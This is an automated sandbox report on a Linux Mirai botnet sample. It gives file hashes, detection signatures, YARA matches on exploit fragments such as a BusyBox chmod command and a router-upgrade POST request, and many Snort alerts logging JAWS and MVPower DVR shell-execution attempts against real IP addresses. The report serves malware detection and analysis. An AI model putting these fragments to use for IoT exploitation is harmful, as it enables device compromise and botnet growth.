Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
file1

Overview

General Information

Sample Name:file1
Analysis ID:575100
MD5:c343f34198cdb0656394f0541c3b1880
SHA1:481c79fcd0b01ef4c614624c1261faca18bdd49c
SHA256:b89d919623f76162795f14a8dcf49159e102e7c7715ce3517ce66c88d7cea1e3
Infos:

Detection

Mirai
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Sample tries to kill multiple processes (SIGKILL)
Performs DNS queries to domains with low reputation
Yara signature match
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Detected TCP or UDP traffic on non-standard ports
Sample tries to kill a process (SIGKILL)
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Creates hidden files and/or directories
Sample has stripped symbol table
HTTP GET or POST without a user agent
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
All domains contacted by the sample do not resolve. The sample is likely an old dropper which does no longer work.

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:575100
Start date:19.02.2022
Start time:16:04:31
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 10s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:file1
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal96.spre.troj.lin@0/1@60/0

Warnings

  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
  • VT rate limit hit for: file1

Runtime Messages

Command:/tmp/file1
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
unstable_is_the_history_of_universe
Standard Error:

Process Tree

  • system is lnxubuntu20
  • dash New Fork (PID: 5209, Parent: 4334)
  • cat (PID: 5209, Parent: 4334, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.bhkKqn6VLL
  • dash New Fork (PID: 5210, Parent: 4334)
  • head (PID: 5210, Parent: 4334, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 5211, Parent: 4334)
  • tr (PID: 5211, Parent: 4334, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 5212, Parent: 4334)
  • cut (PID: 5212, Parent: 4334, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 5213, Parent: 4334)
  • cat (PID: 5213, Parent: 4334, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.bhkKqn6VLL
  • dash New Fork (PID: 5214, Parent: 4334)
  • head (PID: 5214, Parent: 4334, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 5215, Parent: 4334)
  • tr (PID: 5215, Parent: 4334, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 5216, Parent: 4334)
  • cut (PID: 5216, Parent: 4334, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 5217, Parent: 4334)
  • rm (PID: 5217, Parent: 4334, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.bhkKqn6VLL /tmp/tmp.RuRqJkNDuA /tmp/tmp.FX40reyTu0
  • file1 (PID: 5225, Parent: 5108, MD5: c343f34198cdb0656394f0541c3b1880) Arguments: /tmp/file1
    • file1 New Fork (PID: 5226, Parent: 5225)
      • file1 New Fork (PID: 5227, Parent: 5226)
      • file1 New Fork (PID: 5228, Parent: 5226)
      • file1 New Fork (PID: 5229, Parent: 5226)
      • file1 New Fork (PID: 5230, Parent: 5226)
      • file1 New Fork (PID: 5231, Parent: 5226)
  • wrapper-2.0 (PID: 5234, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 5235, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 5236, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 5237, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
    • xfpm-power-backlight-helper (PID: 5248, Parent: 5237, MD5: 3d221ad23f28ca3259f599b1664e2427) Arguments: /usr/sbin/xfpm-power-backlight-helper --get-max-brightness
  • wrapper-2.0 (PID: 5238, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 5239, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • xfconfd (PID: 5250, Parent: 5249, MD5: 4c7a0d6d258bb970905b19b84abcd8e9) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
  • cleanup

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
file1SUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0xf0c8:$xo1: Ik~mhhe+1*4
  • 0xf138:$xo1: Ik~mhhe+1*4
  • 0xf1a8:$xo1: Ik~mhhe+1*4
  • 0xf218:$xo1: Ik~mhhe+1*4
  • 0xf288:$xo1: Ik~mhhe+1*4
  • 0xf4f8:$xo1: Ik~mhhe+1*4
  • 0xf54c:$xo1: Ik~mhhe+1*4
  • 0xf5a0:$xo1: Ik~mhhe+1*4
  • 0xf5f4:$xo1: Ik~mhhe+1*4
  • 0xf648:$xo1: Ik~mhhe+1*4
file1MAL_ELF_LNX_Mirai_Oct10_1Detects ELF Mirai variantFlorian Roth
  • 0xebe4:$x2: /bin/busybox chmod 777 * /tmp/
  • 0xe938:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
  • 0xe8a0:$s3: POST /cdn-cgi/
file1JoeSecurity_Mirai_8Yara detected MiraiJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      5227.1.000000001c6cffe8.00000000ef7785b3.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
      • 0x580:$xo1: Ik~mhhe+1*4
      • 0x5f8:$xo1: Ik~mhhe+1*4
      • 0x670:$xo1: Ik~mhhe+1*4
      • 0x6e8:$xo1: Ik~mhhe+1*4
      • 0x760:$xo1: Ik~mhhe+1*4
      • 0x9f0:$xo1: Ik~mhhe+1*4
      • 0xa48:$xo1: Ik~mhhe+1*4
      • 0xaa0:$xo1: Ik~mhhe+1*4
      • 0xaf8:$xo1: Ik~mhhe+1*4
      • 0xb50:$xo1: Ik~mhhe+1*4
      5225.1.000000001c6cffe8.00000000ef7785b3.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
      • 0x580:$xo1: Ik~mhhe+1*4
      • 0x5f8:$xo1: Ik~mhhe+1*4
      • 0x670:$xo1: Ik~mhhe+1*4
      • 0x6e8:$xo1: Ik~mhhe+1*4
      • 0x760:$xo1: Ik~mhhe+1*4
      • 0x9f0:$xo1: Ik~mhhe+1*4
      • 0xa48:$xo1: Ik~mhhe+1*4
      • 0xaa0:$xo1: Ik~mhhe+1*4
      • 0xaf8:$xo1: Ik~mhhe+1*4
      • 0xb50:$xo1: Ik~mhhe+1*4
      5225.1.000000001a887bdc.00000000328ec990.r-x.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
      • 0xf0c8:$xo1: Ik~mhhe+1*4
      • 0xf138:$xo1: Ik~mhhe+1*4
      • 0xf1a8:$xo1: Ik~mhhe+1*4
      • 0xf218:$xo1: Ik~mhhe+1*4
      • 0xf288:$xo1: Ik~mhhe+1*4
      • 0xf4f8:$xo1: Ik~mhhe+1*4
      • 0xf54c:$xo1: Ik~mhhe+1*4
      • 0xf5a0:$xo1: Ik~mhhe+1*4
      • 0xf5f4:$xo1: Ik~mhhe+1*4
      • 0xf648:$xo1: Ik~mhhe+1*4
      5225.1.000000001a887bdc.00000000328ec990.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_1Detects ELF Mirai variantFlorian Roth
      • 0xebe4:$x2: /bin/busybox chmod 777 * /tmp/
      • 0xe938:$s1: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
      • 0xe8a0:$s3: POST /cdn-cgi/
      5227.1.000000001a887bdc.00000000328ec990.r-x.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
      • 0xf0c8:$xo1: Ik~mhhe+1*4
      • 0xf138:$xo1: Ik~mhhe+1*4
      • 0xf1a8:$xo1: Ik~mhhe+1*4
      • 0xf218:$xo1: Ik~mhhe+1*4
      • 0xf288:$xo1: Ik~mhhe+1*4
      • 0xf4f8:$xo1: Ik~mhhe+1*4
      • 0xf54c:$xo1: Ik~mhhe+1*4
      • 0xf5a0:$xo1: Ik~mhhe+1*4
      • 0xf5f4:$xo1: Ik~mhhe+1*4
      • 0xf648:$xo1: Ik~mhhe+1*4
      Click to see the 5 entries

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: file1Metadefender: Detection: 52%Perma Link
      Source: file1ReversingLabs: Detection: 71%
      Machine Learning detection for sample
      Source: file1Joe Sandbox ML: detected

      Networking

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56470 -> 97.65.142.24:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47592 -> 140.106.235.102:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39896 -> 184.85.12.49:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56470 -> 97.65.142.24:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.85.12.49:80 -> 192.168.2.23:39896
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44608 -> 12.49.90.66:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50530 -> 5.196.5.36:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48962 -> 141.94.132.218:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56170 -> 77.48.35.75:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53906 -> 2.23.77.199:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50530 -> 5.196.5.36:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48962 -> 141.94.132.218:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 2.23.77.199:80 -> 192.168.2.23:53906
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53906 -> 2.23.77.199:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47030 -> 46.225.97.191:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47030 -> 46.225.97.191:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51324 -> 163.191.23.170:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55736 -> 37.97.167.163:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43484 -> 185.65.54.99:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43484 -> 185.65.54.99:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33404 -> 18.168.233.153:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53990 -> 95.214.169.25:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54026 -> 18.184.93.181:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54026 -> 18.184.93.181:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49898 -> 95.101.162.205:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33572 -> 176.58.96.244:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41540 -> 35.199.37.87:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.162.205:80 -> 192.168.2.23:49898
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37356 -> 91.80.135.73:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60252 -> 13.232.138.38:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34356 -> 104.72.142.62:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.72.142.62:80 -> 192.168.2.23:34356
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37356 -> 91.80.135.73:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45942 -> 103.97.200.111:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52436 -> 159.65.239.204:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56860 -> 66.70.175.60:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46394 -> 137.59.52.141:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42696 -> 210.79.31.222:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42078 -> 104.20.223.118:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33740 -> 89.161.251.102:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42078 -> 104.20.223.118:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33740 -> 89.161.251.102:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60506 -> 98.7.66.124:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55326 -> 23.63.33.212:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55450 -> 168.206.255.172:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60506 -> 98.7.66.124:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.63.33.212:80 -> 192.168.2.23:55326
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55450 -> 168.206.255.172:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50134 -> 104.20.192.248:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50134 -> 104.20.192.248:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57908 -> 172.67.190.90:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39666 -> 31.47.77.170:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57908 -> 172.67.190.90:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56716 -> 52.71.50.159:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55616 -> 65.19.162.18:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57986 -> 35.165.181.163:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34076 -> 163.191.220.226:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55306 -> 103.7.100.5:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55306 -> 103.7.100.5:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58832 -> 193.34.145.220:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60186 -> 194.186.95.50:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33534 -> 164.90.131.134:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60186 -> 194.186.95.50:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59716 -> 23.204.251.150:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40558 -> 209.232.145.6:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44490 -> 38.103.143.71:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33534 -> 164.90.131.134:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41280 -> 104.114.9.144:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.204.251.150:80 -> 192.168.2.23:59716
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47364 -> 64.227.101.121:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.114.9.144:80 -> 192.168.2.23:41280
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60474 -> 95.111.198.139:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59440 -> 104.145.251.2:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59440 -> 104.145.251.2:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41102 -> 150.60.98.157:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35496 -> 216.59.41.199:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35496 -> 216.59.41.199:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54772 -> 2.60.113.186:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60602 -> 163.191.76.105:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34000 -> 58.97.48.172:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43312 -> 76.204.134.3:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41912 -> 223.134.2.89:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48260 -> 36.3.56.198:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54074 -> 104.116.68.242:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.116.68.242:80 -> 192.168.2.23:54074
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51720 -> 209.124.46.155:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46292 -> 45.82.72.125:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42576 -> 173.223.252.184:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 173.223.252.184:80 -> 192.168.2.23:42576
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40392 -> 38.40.137.236:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53126 -> 13.251.84.58:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42418 -> 154.22.218.42:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40186 -> 54.199.151.26:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35590 -> 200.127.180.62:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40392 -> 38.40.137.236:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42418 -> 154.22.218.42:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58984 -> 104.80.144.244:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36056 -> 104.85.227.108:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40186 -> 54.199.151.26:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35590 -> 200.127.180.62:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.80.144.244:80 -> 192.168.2.23:58984
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.85.227.108:80 -> 192.168.2.23:36056
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44698 -> 34.96.89.222:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48992 -> 208.100.18.98:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58184 -> 162.247.79.35:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52254 -> 23.14.115.240:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37308 -> 138.68.14.149:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.14.115.240:80 -> 192.168.2.23:52254
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 208.100.18.98:80 -> 192.168.2.23:48992
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53938 -> 111.118.186.46:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60156 -> 202.212.206.81:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46856 -> 23.62.93.236:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59008 -> 23.80.17.107:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37066 -> 198.105.127.82:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60156 -> 202.212.206.81:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.62.93.236:80 -> 192.168.2.23:46856
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55958 -> 79.141.174.115:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34296 -> 23.51.122.210:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.51.122.210:80 -> 192.168.2.23:34296
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49596 -> 78.186.182.66:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39150 -> 200.60.190.23:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49596 -> 78.186.182.66:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43856 -> 35.244.139.154:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57948 -> 52.127.101.5:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42816 -> 12.10.87.14:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60880 -> 23.35.171.209:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35600 -> 174.90.249.169:80
      Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 200.60.190.23:80 -> 192.168.2.23:39150
